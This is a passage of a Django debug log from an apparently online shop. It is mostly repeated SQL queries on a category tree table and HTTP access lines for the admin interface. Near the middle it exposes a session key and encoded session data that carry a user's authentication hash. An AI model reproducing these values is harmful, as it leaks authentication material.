ASC; args=(1,) DEBUG 2019-12-18 07:37:05,396 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 07:37:05,400 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 07:37:05,404 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 07:37:05,408 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 07:37:05,412 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 07:37:05,417 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 07:37:05,421 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 07:37:05,425 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 07:37:05,429 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 07:37:05,433 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 07:37:05,440 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 07:37:05,444 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 07:37:05,448 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 07:37:05,454 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 07:37:05,459 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 07:37:05,464 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 07:37:05,471 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 07:37:05,475 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 07:37:05,479 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 07:37:05,484 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 07:37:05,489 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 07:37:05,496 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 07:37:05,500 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 07:37:05,504 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 07:37:05,508 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 07:37:05,512 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 07:37:05,519 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 07:37:05,523 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 07:37:05,528 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 07:37:05,532 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 07:37:05,535 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 07:37:05,539 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 07:37:05,544 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 07:37:05,548 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 07:37:05,552 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 07:37:05,557 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 07:37:05,561 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) Not Found: /robots.txt [18/Dec/2019 07:37:05] "GET /robots.txt HTTP/1.0" 404 6453 [18/Dec/2019 07:37:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 07:37:05,666 utils 4252 140031732287232 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T07:37:05.650331+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 18, 7, 37, 5, 650331, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-18 07:37:05,671 utils 4252 140031732287232 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [18/Dec/2019 07:37:05] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 DEBUG 2019-12-18 07:37:05,726 utils 4252 140031732287232 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 07:37:05,741 utils 4252 140031732287232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T07:37:05.738554+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 7, 37, 5, 738554, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [18/Dec/2019 07:37:05] "GET / HTTP/1.0" 200 8208 [18/Dec/2019 07:37:05] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [18/Dec/2019 07:37:05] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [18/Dec/2019 07:37:06] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [18/Dec/2019 07:37:06] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [18/Dec/2019 07:37:06] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [18/Dec/2019 07:37:06] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [18/Dec/2019 07:37:06] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [18/Dec/2019 07:37:07] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [18/Dec/2019 07:37:08] "GET /favicon.ico HTTP/1.0" 404 6456 [18/Dec/2019 07:49:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 07:54:15] "GET / HTTP/1.0" 302 0 [18/Dec/2019 07:59:18] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:05:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 08:09:14,297 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 08:09:14,305 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:09:14,308 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 08:09:14,311 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 08:09:14,314 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 08:09:14,317 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 08:09:14,319 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 08:09:14,322 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 08:09:14,326 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 08:09:14,332 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 08:09:14,335 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 08:09:14,337 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 08:09:14,339 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 08:09:14,341 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 08:09:14,345 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 08:09:14,347 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 08:09:14,349 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 08:09:14,351 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 08:09:14,354 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 08:09:14,360 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, 